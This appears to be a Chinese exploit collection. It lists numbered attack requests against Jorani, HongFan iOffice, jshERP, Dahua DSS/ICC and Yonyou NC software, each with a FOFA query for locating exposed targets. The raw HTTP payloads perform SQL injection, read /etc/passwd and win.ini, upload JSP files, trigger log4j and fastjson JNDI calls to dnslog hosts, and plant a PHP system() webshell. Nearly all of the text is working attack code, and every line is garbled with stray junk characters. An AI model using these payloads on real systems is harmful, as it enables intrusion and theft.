! [3 c. f9 }0 a0 {GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
& K2 I H! g, @4 I# e' L: gHost: 127.0.0.1
7 h% _) K8 V! a/ U7 M# YPragma: no-cache
0 P- w3 u, Q CCache-Control: no-cache' R( R+ N1 E3 R2 P4 D- C
Upgrade-Insecure-Requests: 1
* O: q3 b4 X+ kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36# H7 h c4 s5 k0 ]: R
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 T' ]% B# t6 N3 v7 ?* q
Accept-Encoding: gzip, deflate7 [% h0 T0 \* V2 {) r9 ^5 {4 i
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
6 U/ i$ n# i6 F3 R) z- R, r9 @Connection: close
' k* T8 l) H% l' @( b7 E+ N6 C" v# G
2 \" ]& I4 T( b) v12. Jorani < 1.0.2 远程命令执行
4 K! x: V$ }% GFOFA:title="Jorani"
, C9 D9 o0 _0 O6 @" t% |第一步先拿到cookie- }5 b- N& F- e" W% w
GET /session/login HTTP/1.19 \/ M9 k6 W- C* D5 m( C" V' W) L
Host: 192.168.190.30 m" Q- t2 C# @! d$ E4 q
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
8 K. p; O5 P$ ]Connection: close
" X# Z3 r5 B; M. q2 X, @( r4 iAccept-Encoding: gzip
6 F8 D" p8 Z- l% y( s- l, N2 o3 a6 J+ u+ r5 \# r
: I/ p8 ]9 E7 g; L2 {. b/ {( d响应中csrf_cookie_jorani用于后续请求
' }; l$ ?1 D7 |0 \" L+ N+ w7 e) ]HTTP/1.1 200 OK) s/ M* r" Y" @. T9 w5 I7 K9 i0 n
Connection: close% @9 Q5 x1 {& {3 G' E5 r6 c% ]
Cache-Control: no-store, no-cache, must-revalidate9 K5 B$ ~4 G8 s' u$ R2 E
Content-Type: text/html; charset=UTF-8
6 z7 l! y8 A' y) y5 U5 r2 QDate: Tue, 24 Oct 2023 09:34:28 GMT/ K+ K! f4 h8 w: ^: @
Expires: Thu, 19 Nov 1981 08:52:00 GMT2 A; q& S) f) K' l$ X
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
1 Y- A5 K& F% [1 L: sPragma: no-cache+ T! b0 f+ b% w/ Y! {. ]
Server: Apache/2.4.54 (Debian)
. @$ K5 d' c# L( _( U3 qSet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/* e5 r, e4 G7 `- Z. a/ H
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
9 o/ j: E- B; \2 G( ~' |Vary: Accept-Encoding
( w! H: y1 U! {& E9 M% d
1 u; P5 W+ Y m1 T0 Q% T: q& B( ?! t4 ]8 Z
POST请求,执行函数并进行base64编码0 A' H0 T! f8 ?# Z
POST /session/login HTTP/1.1
`# y" }( D) C* u9 R, fHost: 192.168.190.30
" H- P) r. _1 W; X- MUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.366 i- X% O. N! \; z1 Z
Connection: close
- _; p& Y% x$ G3 GContent-Length: 252, d; |4 P1 G2 o3 B8 W. r
Content-Type: application/x-www-form-urlencoded
( z0 f4 N/ R- ~7 A. {Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
1 i$ w% X# w8 |2 W" w# k# C, mAccept-Encoding: gzip
1 [( F+ Z( Z) k# B Z1 @! E. _3 q
+ R6 O2 _9 w4 ? a" ?6 ?- Scsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor7 r) y A! R9 J1 B
* D3 n2 k t1 o
5 s+ j! A. Y) \* \1 N+ O
2 N% L: u0 e' h. U% w3 X向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串1 _; W, g3 A! V
GET /pages/view/log-2023-10-24 HTTP/1.1
: _8 D& r! @0 c NHost: 192.168.190.30
# ^* J- x, L# W5 R/ AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" z% J! n3 h1 h4 C4 ^
Connection: close
9 j" B$ k1 x# ]! l; m0 |% RCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
6 X$ x7 h }5 \- LK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
" Q/ a1 u" b0 W* m' ~( CX-REQUESTED-WITH: XMLHttpRequest
# _& a8 g+ Z+ C4 DAccept-Encoding: gzip
5 D7 v6 G& ?2 u" g4 ]8 E- Z+ L! L+ y
! J6 K9 G' p. j0 S: B
13. 红帆iOffice ioFileDown任意文件读取
1 H. S: |- Z& D% O1 U" uFOFA:app="红帆-ioffice"' w1 W, h# [" F& E" i: g
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1+ q) l, l8 E0 T+ k
Host: x.x.x.x/ V* X( @3 E# R
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36' Y4 G/ R- F( b6 x ?
Connection: close
( o" P( W+ p) J% T" {, {Accept: */*
( o( q5 k* n/ b) i/ f* aAccept-Encoding: gzip
# M3 X1 u3 M) b) M; N( f/ r5 x) H+ s$ R/ W
5 L# q) D* x7 C4 s5 Y14. 华夏ERP(jshERP)敏感信息泄露( n8 @4 v. i/ f* O. ]9 S
FOFA:body="jshERP-boot"
; i6 d, f. U% [) I" Z, E$ o泄露内容包括用户名密码/ Q5 ]% H# m8 I- b7 O
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
/ Z' T" Q7 ^2 t0 e8 c4 uHost: x.x.x.x
- J+ Q: {/ l) A* P S5 DUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.362 z! q7 c% X) j4 a
Connection: close; a! U, G9 z2 \. K' x
Accept: */*! s+ W' s1 X: C; z* M
Accept-Language: en" x8 ?6 C3 E; ^( y1 U0 Z
Accept-Encoding: gzip
- u+ X1 `4 ~( x: U. _8 [# k& v/ S, j3 s0 j" Z7 E: w. N
3 E: }# e, b9 E# k
15. 华夏ERP getAllList信息泄露
! G: P1 \7 D2 o% I, a3 ?CVE-2024-0490
, H, g- h. r9 |1 M1 cFOFA:body="jshERP-boot"
, \$ n* ]4 Q2 q' C$ P) f泄露内容包括用户名密码% F6 t# ?7 U$ z! R$ K2 c. u g1 B
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1" }/ B& i8 Q# w2 a: A
Host: 192.168.40.130:100
( R# N S& G. v8 oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36- K/ }% r" I/ g0 B( D+ W
Connection: close
9 G- }: R2 D3 [: uAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
8 o; h0 X; {- m. |; b. W$ H7 Y: `Accept-Language: en
/ ]! p6 _+ T# x% Esec-ch-ua-platform: Windows4 z4 S; \, N0 L
Accept-Encoding: gzip$ D* z3 K8 x$ S) i$ }" F- r
7 s- q1 \$ \5 z6 O" s" `6 y
5 e5 z7 _% S/ c# v4 v/ T8 R
16. 红帆HFOffice医微云SQL注入
( r) _/ y) u { t) c1 u( ]FOFA:title="HFOffice"
* D; j2 ^! `! Ipoc中调用函数计算1234的md5值: f/ y) \) S$ f9 D0 m C
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
, k1 z$ |- B+ H0 A9 ^# k% Q" DHost: x.x.x.x
/ r4 N" a( I; X) [7 G# K+ uUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36$ K! \, x8 J2 s
Connection: close
! ]& M6 k/ S* R2 RAccept: */*! B; P. p- Q2 F: t h
Accept-Language: en
* p1 x# c( o. B' m" YAccept-Encoding: gzip
1 T, b1 g4 W( @& } W. }' ]# t% F+ K3 ^; Z
: n- R ]6 k2 ]" F' Y
17. 大华 DSS itcBulletin SQL 注入
+ a I3 z, I1 e$ h2 C7 t& Z) BFOFA:app="dahua-DSS"6 B$ y0 E/ Q o. u+ U" d, x5 q( |
POST /portal/services/itcBulletin?wsdl HTTP/1.17 t! g+ ]2 k6 g7 Y' P/ d
Host: x.x.x.x/ [, @& R1 |7 V1 }4 o
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15/ ?6 s J9 I: c- U* m
Connection: close
. G4 h9 ?) F, R) v( u4 }$ E; `# R! z# RContent-Length: 3454 v; n w; t* m6 N4 O; V7 j
Accept-Encoding: gzip
+ }6 p# _, W' C, c, T
6 l! ?) B, U2 H+ Z( H2 e' W<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>+ {3 {" ?/ a% J# H
<s11:Body>) {3 O( w' j2 Y5 v6 a5 f
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>3 W# q9 G) r! s+ Y& f, Z5 V+ s! O+ K
<netMarkings>* V( Y7 F% N5 u$ c* C. `% A
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
: r& W5 M/ J; d1 @5 A* G& m </netMarkings> G* Y; ~+ H; O; a( F* p X
</ns1:deleteBulletin>
8 F8 y4 G% ^$ E; _ </s11:Body>; b7 O d: w' H0 i+ G7 I
</s11:Envelope>& @4 D* E' f- E0 D
) X8 U& a# _7 F; `8 n$ {0 I+ T
9 s* i z' b. H( r, H0 {18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
& F0 U' F8 Q# t# W8 _: fFOFA:app="dahua-DSS"3 i2 D9 M! H( K/ C5 T
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1, U+ {( n2 Z9 f& W8 a5 @
Host: your-ip
- h. {" P2 J& eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.362 e8 _. C( x+ M0 ]' d
Accept-Encoding: gzip, deflate+ {" P; k& `. y H. Q2 Z: d, `
Accept: */*
5 [1 R) c1 I. A% WConnection: keep-alive" }* {- c4 G1 M9 d
3 g* i/ U4 C/ q2 l% Q4 x5 e
/ G: c, j s2 L
9 u. ^. Q# b3 m! L( M. b. H) {19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入* P/ M. f6 j$ F& J( z3 R. b
FOFA:app="dahua-DSS"
0 U% ]1 A7 p' u LGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
) R: V# A. B# e, k) J. hHost:, V" t+ d% z+ D6 N( S5 o
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36' Q$ f1 K3 m8 S% V$ ]& I3 Y
Accept-Encoding: gzip, deflate. U6 V& r+ k9 ?0 r, U, T* x& n
Accept: */*
; { F# C! ^% k) m. y* lConnection: keep-alive; j; M" M8 y$ l; _, m+ i
; B6 d+ Y y: M4 b' _. U
2 k! b2 I, G( e3 B* M20. 大华ICC智能物联综合管理平台任意文件读取1 a/ o! }& [& J: @& S
FOFA:body="*客户端会小于800*"
! k, V/ P* x. }! x, G. a5 \& n7 JGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
; G$ D- V" m& h& z+ @" iHost: x.x.x.x, R, d' H2 s7 M6 L: ^( t9 B
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
, V9 R2 f ^1 z& r! S+ hConnection: close
4 S, g5 C. |8 `$ s: |) wAccept: */*7 ]( R, |# e+ o" r9 [
Accept-Language: en% J8 A% w# B M# w& k- h
Accept-Encoding: gzip
3 Y. N ^: K3 K
) C; M5 s- N6 b n9 D
5 o% }5 U! i8 t3 j0 D' |. Q# w* ?21. 大华ICC智能物联综合管理平台random远程代码执行6 l& m4 n) g1 t* i7 k' S" t
FOFA:icon_hash="-1935899595"
* R/ V0 |6 w5 A( hPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
- B" |3 N( i* rHost: x.x.x.x. Y I" P9 H8 b0 s- c
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
' R- S% K2 L) h( S1 @6 [Content-Length: 161
3 z6 C; m/ N7 r. ?( ^Accept-Encoding: gzip
; L' \6 X& D' O5 PConnection: close
7 |' _, P4 X$ j/ \4 p. W% sContent-Type: application/json;charset=utf-8
+ k7 {1 D! j9 f. y! m$ ?
: ?2 g4 s3 d5 ~ I# J: f{3 M! N* F3 B$ w1 ]
"a":{
- I( s- c4 b& w* I3 [/ d8 H "@type":"com.alibaba.fastjson.JSONObject",5 A3 X1 _7 C$ t8 m- z
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
6 \* |: | \# }- g2 |" N; ~/ Y }""
" S* O4 m+ b$ c4 d$ P9 [9 B7 U1 |}
1 N) T* k: J$ f1 C. h Z7 |0 r+ K6 }
" F$ ]4 t% w! t& o22. 大华ICC智能物联综合管理平台 log4j远程代码执行4 ]1 ]; a# }3 j4 t% l- u
FOFA:icon_hash="-1935899595"; d- V$ I- j) e6 H, y
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.18 p H/ t8 E8 n9 q5 s) ]+ k
Host: your-ip
) b( p9 {& s4 C* K k5 W7 h3 [0 nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
$ D) X; _6 o: v- ?( QContent-Type: application/json;charset=utf-8: @2 u6 N* M+ R9 J1 t. G" b
' L4 G4 h' X# L( E: p{+ I/ g s7 J% |9 Q% _& o+ E
"loginName":"${jndi:ldap://dnslog}". a' @3 l$ [: w- S
}
' ?/ {$ w3 [7 A% p+ j" L
& r: E: j& X2 W1 r8 o( S: _$ R8 q/ e( \3 }) C
7 F3 E4 O1 Q; `* H6 @ [3 d# \2 k& |* C
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行$ D% P5 w0 j. j2 }% N m: _( _
FOFA:icon_hash="-1935899595"
: s4 `: a$ }3 CPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
! D7 B6 V0 U5 D3 gHost: your-ip
0 x8 z% {/ E! c+ V; ]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
5 ^, h! Z: ^" _: q3 e/ D& W) OContent-Type: application/json;charset=utf-8
4 \- D: j9 n- Y6 AAccept-Encoding: gzip2 s# K1 j4 F9 l6 u
Connection: close
* A, @2 }8 b$ U% C" ^" D7 a+ E. [2 d# P& j2 G
{- @% V4 G0 c% B ]
"a":{% k* V, S+ }) t9 g7 j6 K
"@type":"com.alibaba.fastjson.JSONObject",9 B) L2 S: U, j; Q. n
{"@type":"java.net.URL","val":"http://DNSLOG"}0 \, z2 ? b$ j! J* r' L
}""+ R8 E5 P9 B |. @
}
2 m1 k5 I1 e& G( z+ J0 Q* {- x d1 ?4 z' T% k! R# e5 c
3 l1 y4 Q0 U$ v! {2 c24. 用友NC 6.5 accept.jsp任意文件上传6 c: @) I" i8 _: s: ^
FOFA:icon_hash="1085941792"8 b6 O; n* Y) Z9 t0 _0 |9 U/ l M, h
POST /aim/equipmap/accept.jsp HTTP/1.10 Y9 l& b8 p; G8 p. N
Host: x.x.x.x& x& V( G% j) t' B: m! \
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.364 c6 S: O: S7 @5 e" @
Connection: close
9 f/ p. I( C2 o% W" ?5 b4 o. PContent-Length: 449: z3 h1 N8 G0 c5 [
Accept: */*0 o9 J* I% [- P% q6 @" N
Accept-Encoding: gzip" u s% x6 B# n% p; n# e
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
7 v! i( i X7 v' N, M
" U+ _+ [7 U; N-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc1 Y% m0 ?! L( Q
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt", r( O/ O: A& L0 P1 b
Content-Type: text/plain
# C# m5 p2 _. A$ J3 q; H% {& b5 V: w( c( T, s9 S
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>( G1 o5 k) @' K6 [
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
e% j4 R8 i: Z# iContent-Disposition: form-data; name="fname". O5 r# G4 I- F- _- z% T) S
6 \8 \. C! \# q
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp! s. |; I1 @& H1 Y% R5 y
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
0 _5 G( i: n* t9 i, D4 h, q7 Q, H, l
8 L& _$ J. G; @25. 用友NC registerServlet JNDI 远程代码执行* Q' r" i. C9 h9 B- p& k @% Z+ D
FOFA:app="用友-UFIDA-NC"
" c$ L' L* l# u* W, [$ z4 pPOST /portal/registerServlet HTTP/1.1
0 k' G$ G5 _: ^8 vHost: your-ip. W* j: L/ V1 u, {+ s! g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
9 n2 \" u) D$ i) xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.97 V$ ?9 _# P% P/ R
Accept-Encoding: gzip, deflate7 G5 Y2 h, B% x8 |8 r* M
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6$ z. A8 Y9 u/ c
Content-Type: application/x-www-form-urlencoded6 c" Q1 f2 c8 d; M; h- W
8 F4 J8 a4 u) I/ |type=1&dsname=ldap://dnslog8 ?0 c2 M, j) c- }
0 [5 `/ v) w# v" g. N/ w8 \8 v
( Q7 A8 U4 v" h
2 a+ l; e. w! K1 n) L) z! T. o" j! S26. 用友NC linkVoucher SQL注入
1 e% h- p# \! ?FOFA:app="用友-UFIDA-NC"
- ?4 [3 |7 i. @* r$ S! I" IGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1; l! c- v, W# {0 O" ?
Host: your-ip
$ a w2 d2 E& D+ @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36% \) T0 d( e# p( ^, T+ J, V
Content-Type: application/x-www-form-urlencoded p, O |8 S: h8 i- t7 @) b5 ^
Accept-Encoding: gzip, deflate
, s( I0 }; @% R$ AAccept: */*
+ F9 s8 g. m, U$ n( MConnection: keep-alive
0 j& i7 m; \! @
. m1 J+ P, F; I1 P3 R/ c# _
: |7 \$ \+ d, c N27. 用友 NC showcontent SQL注入
. |( R% J8 E% G5 g0 u8 u# eFOFA:icon_hash="1085941792"+ r% W7 h" ?7 C: h; _2 X5 U8 T
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
& F0 [) f0 A: n! A0 j: X1 iHost: your-ip
% v* T% ^$ u; y4 I: i3 ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
7 \4 o% y7 T; w: U3 Z- RAccept-Encoding: identity# Q& V7 h0 G; {( S
Connection: close1 ]! [% |2 K, B% t
Content-Type: text/xml; charset=utf-8) f" i2 f+ s' Y, [5 q7 O' n
d0 I$ V$ H5 M# q4 ]$ w7 F6 T( |( \/ w8 }; l1 t- y/ L0 z
28. 用友NC grouptemplet 任意文件上传
0 b9 N# l2 V! T) VFOFA:icon_hash="1085941792"7 b. P9 O" z: m1 x) a
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
- P. w; B! }. M; Q* G3 l5 IHost: x.x.x.x
, U: [) B- X5 `9 M, H. G4 v4 SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
+ \% H1 M I& E7 zConnection: close7 V) ^2 M1 G/ O7 u, K
Content-Length: 268
6 p+ L- k7 S+ H$ j/ F" i. ^$ M$ nContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk. M) M3 C% `0 V( d
Accept-Encoding: gzip2 j3 ~; z) H, @' r
4 l4 Q- s: G" c5 |2 ?------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk" H: Q3 Y( |$ ^* s4 C
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
; V* p7 r# C k0 j5 IContent-Type: application/octet-stream5 T) W( X$ Y+ }0 l, ]
# Q; ]; |. d% z6 ~3 R7 Z5 s
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>3 T' O6 G: t. j2 J8 R8 ~4 w& a
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--9 q" R. y1 P) P! W' k
# w% v3 s! x/ s
7 |; e0 M% S) g4 f1 r; e- j/uapim/static/pages/nc/head.jsp) w R; {; ]9 W6 H: K. e( w
5 [( c# Q* K: I
29. 用友NC down/bill SQL注入" V5 @+ u+ x: V* l% l* W" s
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"; c" \1 @+ }' J
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.16 ?5 b$ ]) B6 x( z% m# w
Host: your-ip, D$ g9 l: B) J4 L Y# i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
6 \! I8 |8 T* N, xContent-Type: application/x-www-form-urlencoded
* y& [! Y0 E: t2 kAccept-Encoding: gzip, deflate
* T0 r) v* M2 eAccept: */*
& k3 _3 P5 X3 L% q* e Z% `Connection: keep-alive$ C0 r4 `3 Z& N. T1 K; E% |7 H& Z4 H
5 m' ~! F' x. w# f% R$ g) O+ Y
9 p9 `: `* c I* x, h" @30. 用友NC importPml SQL注入
, s+ D; S G7 f, y8 UFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"1 S8 D" ?# Q! [( K4 d
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
: Q9 _( b% d1 ?3 R! y% |+ u' U- AHost: your-ip B! ]: O6 A C& L p8 o5 s
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V! s+ X( D1 `' Y1 k7 r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
: S% ?* u. u, @4 PConnection: close% j: t+ K9 a4 Q- H
. o1 v! {: c4 z3 |# ?------WebKitFormBoundaryH970hbttBhoCyj9V
7 i+ r' q$ d8 ]Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
5 y4 d- H$ ^0 L( tContent-Type: image/jpeg
+ P: C5 \6 t# N& v* ?------WebKitFormBoundaryH970hbttBhoCyj9V--
1 ~& T* P# k! M4 q/ z+ u0 Z) R t! L
1 M1 S4 G4 I; z8 o0 o3 M# d- M9 h' W' a0 R5 Z0 [% V
31. 用友NC runStateServlet SQL注入
- g/ P. Q; |* B! L0 s: w/ fversion<=6.55 w& R7 x' V7 b1 t. |( m0 _# D
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
' @$ t$ Z% c; BGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1& H3 I3 x* @; P+ J1 f$ j
Host: host9 K6 S! M2 g$ j& k6 R0 H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36* V) j+ A$ P. w& R V( q. |
Content-Type: application/x-www-form-urlencoded) [& p/ C2 V- [& V' h* j4 S
7 o# K8 H+ u% Q, h6 f6 e- n/ H4 o0 N8 i- z# r/ _2 P- j
32. 用友NC complainbilldetail SQL注入 R9 c2 x& k( I) n
version= NC633、NC65
, O" m: \8 }1 ^; A4 xFOFA:app="用友-UFIDA-NC"0 F4 |1 D# A" R F
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
) L; Q. j( j! kHost: your-ip
" T% K* D/ B: |* KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36( @# K e0 L% j _7 X
Content-Type: application/x-www-form-urlencoded2 z' Q, @1 c3 j+ w5 ^
Accept-Encoding: gzip, deflate
( d& T" V) v& @Accept: */** U. l' ?! {' W. C& a
Connection: keep-alive) l+ `( i6 X+ _) h2 a P+ E
& g F# P: e/ B3 Z- s" C/ r# n$ _3 s9 i6 C
33. 用友NC downTax/download SQL注入5 s N( j9 _2 l
version:NC6.5FOFA:app="用友-UFIDA-NC"
8 h6 \1 ^: l' ]) ^GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.16 _) e/ P9 b6 J) _4 p& f) c
Host: your-ip
: X+ }: O, w1 Z- }% k3 FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
3 a* N' H+ I- l3 |$ Y3 E5 s hContent-Type: application/x-www-form-urlencoded% U" I9 R1 [% b
Accept-Encoding: gzip, deflate
0 ]* s( G7 W8 f. m1 OAccept: */*
" T6 a3 T5 a$ |" u& zConnection: keep-alive! M1 W8 v$ G7 |- O; o5 l; n
% u) g0 R w6 g5 ]5 v. o, e
/ v i. p8 d' c/ o2 H, H Z
34. 用友NC warningDetailInfo接口SQL注入
/ x. h2 v: u" WFOFA:app="用友-UFIDA-NC"( j+ l* m6 l. h5 \% A ^
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
, K3 b3 t0 n" b8 {- Y: Q8 j# _4 ZHost: your-ip( z2 u8 [/ W& R% D+ U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
, h( {" \- O9 N6 g- zContent-Type: application/x-www-form-urlencoded& F! y) Y* D( n5 t" D* p
Accept-Encoding: gzip, deflate, e1 L$ P8 B" I* }% V! a
Accept: */*
A3 q2 G' j) y9 o1 ~7 B; A FConnection: keep-alive
. F3 @- t9 y% r7 ~5 T* E% `/ l `6 Q
5 g3 A6 L# Y) X& B$ Y3 Q1 e
35. 用友NC-Cloud importhttpscer任意文件上传8 ]* F+ k; I; l4 f0 z
FOFA:app="用友-NC-Cloud"& d" d0 C) t2 Z# [/ `1 P: v+ j6 Q
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1, o0 A4 L) ?3 }; ~# F- f6 z, c% L
Host: 203.25.218.166:88886 A' R+ f- ^. Z- X
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info( ^ s2 G. Q' U. x M: }* z7 s
Accept-Encoding: gzip, deflate- P5 j& q8 @; A, `2 t
Accept: */*
